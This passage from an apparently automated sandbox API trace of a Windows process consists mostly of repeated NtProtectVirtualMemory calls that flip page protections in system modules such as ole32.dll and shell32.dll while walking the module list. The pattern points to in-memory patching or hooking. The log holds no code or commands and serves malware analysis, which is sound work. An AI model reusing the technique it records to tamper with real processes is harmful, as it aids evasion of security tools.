BaseAddress=0x41f538*=0x76e41258, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.643] GetCurrentProcess () returned 0xffffffff [0053.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41258, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.644] GetCurrentProcess () returned 0xffffffff [0053.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41260, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.644] GetCurrentProcess () returned 0xffffffff [0053.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41260, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.644] GetCurrentProcess () returned 0xffffffff [0053.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41268, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.644] GetCurrentProcess () returned 0xffffffff [0053.644] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41268, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.645] GetCurrentProcess () returned 0xffffffff [0053.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.645] GetCurrentProcess () returned 0xffffffff [0053.645] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.646] GetCurrentProcess () returned 0xffffffff [0053.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.646] GetCurrentProcess () returned 0xffffffff [0053.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.646] GetCurrentProcess () returned 0xffffffff [0053.646] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.647] GetCurrentProcess () returned 0xffffffff [0053.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e412cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.647] GetCurrentProcess () returned 0xffffffff [0053.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41300, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.647] GetCurrentProcess () returned 0xffffffff [0053.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41300, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.647] GetCurrentProcess () returned 0xffffffff [0053.647] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41308, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.648] GetCurrentProcess () returned 0xffffffff [0053.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41308, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.648] GetCurrentProcess () returned 0xffffffff [0053.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e4132c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.648] GetCurrentProcess () returned 0xffffffff [0053.648] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e4132c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.648] GetCurrentProcess () returned 0xffffffff [0053.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41384, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.649] GetCurrentProcess () returned 0xffffffff [0053.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41384, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.649] GetCurrentProcess () returned 0xffffffff [0053.649] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41390, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.651] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.652] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.652] GetModuleFileNameA (in: hModule=0x76620000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0053.654] GetCurrentProcess () returned 0xffffffff [0053.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766214a0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.654] GetCurrentProcess () returned 0xffffffff [0053.654] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766214b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.655] GetCurrentProcess () returned 0xffffffff [0053.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766214b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.655] GetCurrentProcess () returned 0xffffffff [0053.655] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766219a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.656] GetCurrentProcess () returned 0xffffffff [0053.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766219a8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.656] GetCurrentProcess () returned 0xffffffff [0053.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766219ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.656] GetCurrentProcess () returned 0xffffffff [0053.656] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x766219ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.657] GetCurrentProcess () returned 0xffffffff [0053.657] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76621a00, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.657] GetCurrentProcess () returned 0xffffffff [0053.657] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76621a00, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.657] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.658] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.658] GetModuleFileNameA (in: hModule=0x759d0000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0053.659] GetCurrentProcess () returned 0xffffffff [0053.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d113c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.659] GetCurrentProcess () returned 0xffffffff [0053.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d113c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.659] GetCurrentProcess () returned 0xffffffff [0053.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d114c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.659] GetCurrentProcess () returned 0xffffffff [0053.659] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d114c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.660] GetCurrentProcess () returned 0xffffffff [0053.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d1150, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.660] GetCurrentProcess () returned 0xffffffff [0053.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d1150, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.660] GetCurrentProcess () returned 0xffffffff [0053.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d1174, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.660] GetCurrentProcess () returned 0xffffffff [0053.660] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d1174, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.661] GetCurrentProcess () returned 0xffffffff [0053.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d11d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.661] GetCurrentProcess () returned 0xffffffff [0053.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d11d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d13b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.661] GetCurrentProcess () returned 0xffffffff [0053.661] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d13b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.662] GetCurrentProcess () returned 0xffffffff [0053.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d13c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.662] GetCurrentProcess () returned 0xffffffff [0053.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d13c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d21c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d2000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.662] GetCurrentProcess () returned 0xffffffff [0053.662] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d21c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d2000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.663] GetCurrentProcess () returned 0xffffffff [0053.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d224c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d2000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.663] GetCurrentProcess () returned 0xffffffff [0053.663] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x759d224c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x759d2000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.663] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1014, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.664] GetCurrentProcess () returned 0xffffffff [0053.664] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1014, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.664] GetCurrentProcess () returned 0xffffffff [0053.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.665] GetCurrentProcess () returned 0xffffffff [0053.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.665] GetCurrentProcess () returned 0xffffffff [0053.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f109c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.665] GetCurrentProcess () returned 0xffffffff [0053.665] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f109c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.666] GetCurrentProcess () returned 0xffffffff [0053.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.666] GetCurrentProcess () returned 0xffffffff [0053.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.666] GetCurrentProcess () returned 0xffffffff [0053.666] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.667] GetCurrentProcess () returned 0xffffffff [0053.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.667] GetCurrentProcess () returned 0xffffffff [0053.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.667] GetCurrentProcess () returned 0xffffffff [0053.667] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.668] GetCurrentProcess () returned 0xffffffff [0053.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.668] GetCurrentProcess () returned 0xffffffff [0053.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f10f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.668] GetCurrentProcess () returned 0xffffffff [0053.668] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1104, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.669] GetCurrentProcess () returned 0xffffffff [0053.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1104, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.669] GetCurrentProcess () returned 0xffffffff [0053.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.669] GetCurrentProcess () returned 0xffffffff [0053.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.669] GetCurrentProcess () returned 0xffffffff [0053.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f111c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.669] GetCurrentProcess () returned 0xffffffff [0053.669] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f111c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.670] GetCurrentProcess () returned 0xffffffff [0053.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1120, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.670] GetCurrentProcess () returned 0xffffffff [0053.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1120, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.670] GetCurrentProcess () returned 0xffffffff [0053.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1124, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.670] GetCurrentProcess () returned 0xffffffff [0053.670] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1124, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x772f1000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.671] GetCurrentProcess () returned 0xffffffff [0053.671] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x772f1128, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: 